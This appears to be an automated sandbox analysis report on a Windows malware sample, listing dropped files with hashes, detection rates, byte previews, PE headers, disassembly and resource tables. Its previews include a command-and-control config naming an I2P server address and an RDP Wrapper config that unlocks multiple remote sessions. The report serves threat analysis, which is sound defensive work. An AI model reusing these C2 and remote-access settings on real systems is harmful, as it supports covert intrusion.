                                                                  SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                                                                  SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                                                                  Malicious:false
                                                                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):92672
                                                                  Entropy (8bit):6.229119632298774
                                                                  Encrypted:false
                                                                  SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                                                                  MD5:7FEA520E80E7A73252F2A5C204BBF820
                                                                  SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                                                                  SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                                                                  SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):37376
                                                                  Entropy (8bit):5.7181012847214445
                                                                  Encrypted:false
                                                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:Generic INItialization configuration [SLPolicy]
                                                                  Category:dropped
                                                                  Size (bytes):456534
                                                                  Entropy (8bit):5.450314708570292
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                                                                  MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                                                                  SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                                                                  SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                                                                  SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                                                                  Malicious:false
                                                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):105984
                                                                  Entropy (8bit):6.285421743969757
                                                                  Encrypted:false
                                                                  SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                                                                  MD5:6E01ED70D02CE47F4D27762A9E949DEE
                                                                  SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                                                                  SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                                                                  SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8568
                                                                  Entropy (8bit):4.958673415285098
                                                                  Encrypted:false
                                                                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                  MD5:27535CEE6740DFC50A78A0322415E67C
                                                                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                  Malicious:false
                                                                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):115712
                                                                  Entropy (8bit):6.193969228624904
                                                                  Encrypted:false
                                                                  SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                                                                  MD5:EC9499EE84ED09B77BE0A35EC87B781C
                                                                  SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                                                                  SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                                                                  SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.465574597026334
                                                                  Encrypted:false
                                                                  SSDEEP:6144:eIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbh:zXD94zWlLZMM6YFHx+h
                                                                  MD5:44682A3D0469D008C49805F95F2501F2
                                                                  SHA1:8D45D99D347183FAC85AA2B44516E84B2FFDE8D4
                                                                  SHA-256:6E9D423480106A82A069DCE49FF54CD3A4179CBEEDC06D04A33507FCC5FC7B0E
                                                                  SHA-512:F5BA0B660720B8F91ECF16C935FC89B6BB8DAC9D321FFC225FE1B72312BD7EF7093997246689BBE559BA02AF5F0E6C0A27CBA4DAB9535BCC52209EC8833B5A34
                                                                  Malicious:false
                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..|.^d..............................................................................................................................................................................................................................................................................................................................................^.k.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.090626315462076
                                                                  TrID:
                                                                  • Win64 Executable GUI (202006/5) 92.64%
                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                  • VXD Driver (31/22) 0.01%
                                                                  File name:80P.exe
                                                                  File size:13'431'296 bytes
                                                                  MD5:f0cfd22855ee0cf1935a36ea32f15138
                                                                  SHA1:8d971dc8a0f41f2e2c9dbd80f4b0cd5e1f164a96
                                                                  SHA256:acc39a1fdfcecae66662397c3d8e49d29efaebd8739f1603870a01dd3a603db7
                                                                  SHA512:3215d35ccb3139a6b0e8f8ce14f9ffeb4162fd86fbf14195d5a3adfe204f1094731114ddd8ad72f2ab9fc4cc7f871a427b26b051ce6a0e5e59f60c4cd981c699
                                                                  SSDEEP:98304:DTVRJeZFMLcycZsAqoeosQJ2XP4CRXKdQI:nMZFMtcQoeoJJ2XQ
                                                                  TLSH:5BD64AAB77A5816AC11EC13FC0A38F14E933B0BD1B33C2E756A006686E569D15E3F725
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                                                                  Icon Hash:6ab06e9aaaba8e50
                                                                  Entrypoint:0xda13b0
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x677F84C7 [Thu Jan 9 08:11:51 2025 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:2
                                                                  File Version Major:5
                                                                  File Version Minor:2
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:2
                                                                  Import Hash:e9ab8d1a1e1aadf77912f5c21a0fe136
                                                                  Instruction
                                                                  push ebp
                                                                  dec eax
                                                                  sub esp, 20h
                                                                  dec eax
                                                                  mov ebp, esp
                                                                  nop
                                                                  dec eax
                                                                  lea ecx, dword ptr [FFFE7948h]
                                                                  call 00007F734C61E230h
                                                                  dec eax
                                                                  mov eax, dword ptr [000CF06Ch]
                                                                  dec eax
                                                                  mov ecx, dword ptr [eax]
                                                                  call 00007F734C8D9621h
                                                                  dec eax
                                                                  mov eax, dword ptr [000CF05Dh]
                                                                  dec eax
                                                                  mov ecx, dword ptr [eax]
                                                                  mov dl, 01h
                                                                  call 00007F734C8DC2D0h
                                                                  dec eax
                                                                  mov eax, dword ptr [000CF04Ch]
                                                                  dec eax
                                                                  mov ecx, dword ptr [eax]
                                                                  dec eax
                                                                  mov edx, dword ptr [FFFE729Ah]
                                                                  dec esp
                                                                  mov eax, dword ptr [000CF713h]
                                                                  call 00007F734C8D9623h
                                                                  dec eax
                                                                  mov eax, dword ptr [000CF02Fh]
                                                                  dec eax
                                                                  mov ecx, dword ptr [eax]
                                                                  call 00007F734C8D9834h
                                                                  call 00007F734C615A9Fh
                                                                  jmp 00007F734CFA70AAh
                                                                  nop
                                                                  nop
                                                                  call 00007F734C615C96h
                                                                  nop
                                                                  dec eax
                                                                  lea esp, dword ptr [ebp+20h]
                                                                  pop ebp
                                                                  ret
                                                                  dec eax
                                                                  nop
                                                                  dec eax
                                                                  lea eax, dword ptr [00000000h+eax]
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  call 00007F734C61522Ch
                                                                  dec eax
                                                                  add esp, 28h
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xaa20000x9b.edata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa920000x5428.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xba40000x152400.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0xb290000x7ab44.pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa50000x83a34.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xaa40000x28.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xa935d00x13d8.idata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xa980000x91e8.didata
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x9a04400x9a060086ab2c29a74a9a3f8286ef7f07a6c44aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .data0x9a20000xcee880xcf000e7c0216a0b9eb2d7bb050025a60dbaecFalse0.24514195538949277data5.013415006905215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .bss0xa710000x2009c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata0xa920000x54280x56008079d6b23603a8d628668b529d4acd7eFalse0.24186954941860464data4.197586647952889IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .didata0xa980000x91e80x920084f4aba25f0fcdc394fc7ea937b302a3False0.17251712328767124data3.9960604688613506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .edata0xaa20000x9b0x200fb38ec46dc9b947d7acbee5f0402f0e2False0.259765625data1.9037880203964852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .tls0xaa30000x1e40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rdata0xaa40000x6d0x20065e0a56bbc168ec70c7cc399dfdc440aFalse0.1953125data1.3785450098484393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xaa50000x83a340x83c00180edf31e87591fbd0f232d1cbd6ddf3False0.4384747094402277data6.419267216465653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  .pdata0xb290000x7ab440x7ac00bd68278add5290f49786a6ee841901cfFalse0.49804289714867617data6.514485853671856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xba40000x1524000x152400a3dbd25a8e596a879751061a0cef81d6False0.34984323032150777data6.492346409529165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_CURSOR0xba6d640x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                  RT_CURSOR0xba6e980x134dataEnglishUnited States0.4642857142857143
                                                                  RT_CURSOR0xba6fcc0x134dataEnglishUnited States0.4805194805194805
                                                                  RT_CURSOR0xba71000x134dataEnglishUnited States0.38311688311688313
                                                                  RT_CURSOR0xba72340x134dataEnglishUnited States0.36038961038961037
                                                                  RT_CURSOR0xba73680x134dataEnglishUnited States0.4090909090909091
                                                                  RT_CURSOR0xba749c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                  RT_ICON0xba75d00x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 00.20460607304062373
                                                                  RT_ICON0xbac1f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4031791907514451
                                                                  RT_ICON0xbac7600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6814079422382672
                                                                  RT_ICON0xbad0080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.517590618336887
                                                                  RT_ICON0xbadeb00x5c70PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9795892494929006
                                                                  RT_STRING0xbb3b200x9c0data0.27123397435897434
                                                                  RT_STRING0xbb44e00x79cdata0.2818275154004107
                                                                  RT_STRING0xbb4c7c0x380data0.4029017857142857
                                                                  RT_STRING0xbb4ffc0x43cdata0.36900369003690037
                                                                  RT_STRING0xbb54380x464data0.34519572953736655
                                                                  RT_STRING0xbb589c0x490data0.3236301369863014
                                                                  RT_STRING0xbb5d2c0x504data0.39485981308411217
                                                                  RT_STRING0xbb62300x214data0.4473684210526316
                                                                  RT_STRING0xbb64440x3d8data0.24491869918699186
                                                                  RT_STRING0xbb681c0x2d4data0.4516574585635359
                                                                  RT_STRING0xbb6af00x49cdata0.4228813559322034
                                                                  RT_STRING0xbb6f8c0x404data0.4260700389105058
                                                                  RT_STRING0xbb73900x244data0.4586206896551724
                                                                  RT_STRING0xbb75d40x2d4data0.48342541436464087
                                                                  RT_STRING0xbb78a80x504data0.3878504672897196
                                                                  RT_STRING0xbb7dac0x3b4data0.3818565400843882
                                                                  RT_STRING0xbb81600x388data0.375
                                                                  RT_STRING0xbb84e80x2e4data0.4743243243243243
                                                                  RT_STRING0xbb87cc0x3bcdata0.3619246861924686
                                                                  RT_STRING0xbb8b880x304data0.3911917098445596
                                                                  RT_STRING0xbb8e8c0x3f8data0.4153543307086614
                                                                  RT_STRING0xbb92840x3f4data0.3932806324110672
                                                                  RT_STRING0xbb96780x548data0.28920118343195267
                                                                  RT_STRING0xbb9bc00x308data0.42010309278350516
                                                                  RT_STRING0xbb9ec80x260data0.45394736842105265
                                                                  RT_STRING0xbba1280x110data0.6139705882352942
                                                                  RT_STRING0xbba2380x44cdata0.37454545454545457
                                                                  RT_STRING0xbba6840x450data0.3976449275362319
                                                                  RT_STRING0xbbaad40x5c8data0.34256756756756757
                                                                  RT_STRING0xbbb09c0x470data0.3503521126760563
                                                                  RT_STRING0xbbb50c0x2c0data0.3991477272727273
                                                                  RT_STRING0xbbb7cc0x418data0.3998091603053435
                                                                  RT_STRING0xbbbbe40x9cdata0.717948717948718
                                                                  RT_STRING0xbbbc800xe8data0.6293103448275862
                                                                  RT_STRING0xbbbd680x364data0.423963133640553
                                                                  RT_STRING0xbbc0cc0x410data0.3663461538461538
                                                                  RT_STRING0xbbc4dc0x354data0.392018779342723
                                                                  RT_STRING0xbbc8300x5b0data0.32005494505494503
                                                                  RT_STRING0xbbcde00x250data0.33952702702702703
                                                                  RT_STRING0xbbd0300x414data0.4157088122605364
                                                                  RT_STRING0xbbd4440x6acdata0.3366510538641686
                                                                  RT_STRING0xbbdaf00x46cdata0.3568904593639576
                                                                  RT_STRING0xbbdf5c0x368data0.37729357798165136
                                                                  RT_STRING0xbbe2c40x34cdata0.3886255924170616
                                                                  RT_STRING0xbbe6100x3c4data0.36721991701244816
                                                                  RT_STRING0xbbe9d40x3fcdata0.3764705882352941
                                                                  RT_STRING0xbbedd00xd0data0.5288461538461539
                                                                  RT_STRING0xbbeea00xb8data0.6467391304347826
                                                                  RT_STRING0xbbef580x2c0data0.46732954545454547
                                                                  RT_STRING0xbbf2180x434data0.3308550185873606
                                                                  RT_STRING0xbbf64c0x360data0.38425925925925924
                                                                  RT_STRING0xbbf9ac0x2ecdata0.37566844919786097
                                                                  RT_STRING0xbbfc980x31cdata0.34296482412060303
                                                                  RT_RCDATA0xbbffb40x627eJPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3EnglishUnited States0.9922265408106608
                                                                  RT_RCDATA0xbc62340x10data1.5
                                                                  RT_RCDATA0xbc62440x1536MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixelEnglishUnited States0.6550644567219153
                                                                  RT_RCDATA0xbc777c0x359GIF image data, version 89a, 16 x 16EnglishUnited States0.15635939323220538
                                                                  RT_RCDATA0xbc7ad80x378GIF image data, version 89a, 21 x 21EnglishUnited States0.5529279279279279
                                                                  RT_RCDATA0xbc7e500x12cGIF image data, version 89a, 10 x 12EnglishUnited States0.83
                                                                  RT_RCDATA0xbc7f7c0x129GIF image data, version 89a, 10 x 12EnglishUnited States0.7575757575757576
                                                                  RT_RCDATA0xbc80a80x4c8GIF image data, version 89a, 24 x 24EnglishUnited States0.6282679738562091
                                                                  RT_RCDATA0xbc85700x4b5GIF image data, version 89a, 24 x 24EnglishUnited States0.5526970954356847
                                                                  RT_RCDATA0xbc8a280x42eGIF image data, version 89a, 24 x 24EnglishUnited States0.5112149532710281
                                                                  RT_RCDATA0xbc8e580x42eGIF image data, version 89a, 24 x 24EnglishUnited States0.4766355140186916
                                                                  RT_RCDATA0xbc92880x432GIF image data, version 89a, 24 x 24EnglishUnited States0.5027932960893855
                                                                  RT_RCDATA0xbc96bc0x434GIF image data, version 89a, 24 x 24EnglishUnited States0.4758364312267658
                                                                  RT_RCDATA0xbc9af00x4daGIF image data, version 89a, 24 x 24EnglishUnited States0.6191626409017713
                                                                  RT_RCDATA0xbc9fcc0x4c1GIF image data, version 89a, 24 x 24EnglishUnited States0.5825801150369762
                                                                  RT_RCDATA0xbca4900x449GIF image data, version 89a, 24 x 24EnglishUnited States0.5077484047402006
                                                                  RT_RCDATA0xbca8dc0x455GIF image data, version 89a, 24 x 24EnglishUnited States0.5067628494138864
                                                                  RT_RCDATA0xbcad340x4ceGIF image data, version 89a, 24 x 24EnglishUnited States0.6699186991869919
                                                                  RT_RCDATA0xbcb2040x4b9GIF image data, version 89a, 24 x 24EnglishUnited States0.5665839536807279
                                                                  RT_RCDATA0xbcb6c00x32eGIF image data, version 89a, 24 x 24EnglishUnited States0.9582309582309583
                                                                  RT_RCDATA0xbcb9f00x30eGIF image data, version 89a, 24 x 24EnglishUnited States0.8491048593350383
                                                                  RT_RCDATA0xbcbd000x444GIF image data, version 89a, 24 x 24EnglishUnited States0.5265567765567766
                                                                  RT_RCDATA0xbcc1440x44fGIF image data, version 89a, 24 x 24EnglishUnited States0.4877606527651859
                                                                  RT_RCDATA0xbcc5940x4b5GIF image data, version 89a, 24 x 24EnglishUnited States0.6182572614107884
                                                                  RT_RCDATA0xbcca4c0x4abGIF image data, version 89a, 24 x 24EnglishUnited States0.5581589958158996
                                                                  RT_RCDATA0xbccef80x480GIF image data, version 89a, 24 x 24EnglishUnited States0.5815972222222222
                                                                  RT_RCDATA0xbcd3780x46aGIF image data, version 89a, 24 x 24EnglishUnited States0.5389380530973451
                                                                  RT_RCDATA0xbcd7e40x679HTML document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.46107423053711527
                                                                  RT_RCDATA0xbcde600xacfGIF image data, version 89a, 32 x 32EnglishUnited States0.6841344416335381
                                                                  RT_RCDATA0xbce9300xe34GIF image data, version 89a, 105 x 141EnglishUnited States1.0030253025302531
                                                                  RT_RCDATA0xbcf7640xa25GIF image data, version 89a, 171 x 75EnglishUnited States1.0042356565267616
                                                                  RT_RCDATA0xbd018c0x4bGIF image data, version 89a, 16 x 16EnglishUnited States0.9733333333333334
                                                                  RT_RCDATA0xbd01d80x3fGIF image data, version 89a, 12 x 16EnglishUnited States1.0317460317460319
                                                                  RT_RCDATA0xbd02180x6eGIF image data, version 89a, 16 x 16EnglishUnited States1.009090909090909
                                                                  RT_RCDATA0xbd02880x50GIF image data, version 89a, 16 x 16EnglishUnited States1.025
                                                                  RT_RCDATA0xbd02d80x6cGIF image data, version 89a, 16 x 16EnglishUnited States1.0092592592592593
                                                                  RT_RCDATA0xbd03440x4fGIF image data, version 89a, 16 x 16EnglishUnited States1.0253164556962024
                                                                  RT_RCDATA0xbd03940x6fGIF image data, version 89a, 17 x 16EnglishUnited States1.018018018018018
                                                                  RT_RCDATA0xbd04040x41GIF image data, version 89a, 15 x 15EnglishUnited States0.9846153846153847
                                                                  RT_RCDATA0xbd04480x3cGIF image data, version 89a, 16 x 12EnglishUnited States1.0333333333333334
                                                                  RT_RCDATA0xbd04840x69GIF image data, version 89a, 16 x 16EnglishUnited States1.019047619047619
                                                                  RT_RCDATA0xbd04f00x4dGIF image data, version 89a, 16 x 16EnglishUnited States1.025974025974026
                                                                  RT_RCDATA0xbd05400x71GIF image data, version 89a, 16 x 17EnglishUnited States1.079646017699115
                                                                  RT_RCDATA0xbd05b40x69GIF image data, version 89a, 16 x 16EnglishUnited States1.0095238095238095
